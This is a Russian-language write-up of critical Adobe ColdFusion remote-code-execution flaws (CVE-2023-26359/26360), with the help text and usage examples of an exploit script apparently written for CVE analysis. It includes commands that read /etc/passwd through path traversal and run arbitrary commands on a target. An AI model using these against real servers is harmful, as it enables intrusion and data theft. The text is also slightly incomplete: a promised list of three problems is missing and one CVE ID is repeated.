
8 марта 2023 года Adobe выпустила обновления безопасности для устранения критических уязвимостей в Adobe ColdFusion — популярной платформе для разработки веб-приложений. Эти уязвимости, классифицируемые как нарушение контроля доступа и небезопасная десериализация, приводят к несанкционированному удалённому выполнению кода (RCE) при отправке злоумышленником специально созданного запроса, содержащего недоверенные данные, на сервер ColdFusion.
Эксплуатация не требует взаимодействия с пользователем, что делает её особенно серьёзной, поскольку позволяет злоумышленникам выполнять произвольный код в контексте текущего пользователя без его ведома.
Агентство по кибербезопасности и защите инфраструктуры (CISA) подчеркнуло серьёзность этой проблемы 5 декабря 2023 года, выпустив предупреждение об активной эксплуатации этих уязвимостей. Они отметили, что данная уязвимость используется киберпреступниками для получения первоначального доступа к публичным веб-серверам Adobe ColdFusion. Наиболее серьёзная уязвимость имеет показатель CVSS 9.8, что относит её к категории Critical.
В целом, после дальнейшего расследования были выявлены три различные проблемы:
Этот эксплойт-скрипт написан для анализа CVE на vsociety.
Справка:
usage: exploit.py [-h] --host HOST [--read-file READ_FILE] [--cmd CMD] [--endpoint ENDPOINT] [--win] [--proxy PROXY]
Exploit script for remote file read or command execution against Adobe ColdFusion (CVE-2023-26359, CVE-2023-26360, and CVE-2023-26359).
options:
-h, --help show this help message and exit
--host HOST Target host URL
--read-file READ_FILE, -f READ_FILE
File path to read from the host
--cmd CMD, -c CMD Command to execute on the target
--endpoint ENDPOINT Endpoint URL
--win Specify this if the target host is considered to be Windows.
--proxy PROXY Proxy URL
# Arbirary file read
python3 exploit.py --host http://localhost:8500 --read-file '../../../../etc/passwd'
# RCE
python3 exploit.py --host http://localhost:8500 --cmd 'CMD'
Этот эксплойт-скрипт был создан исключительно в исследовательских целях и для разработки эффективных методов защиты. Он не предназначен для использования в любых вредоносных или несанкционированных действиях. Автор и владелец скрипта снимают с себя ответственность за любое неправильное использование или ущерб, причинённый данным программным обеспечением. Пользователям настоятельно рекомендуется использовать это программное обеспечение ответственно и только в соответствии с действующими законами и нормативными актами. Используйте ответственно.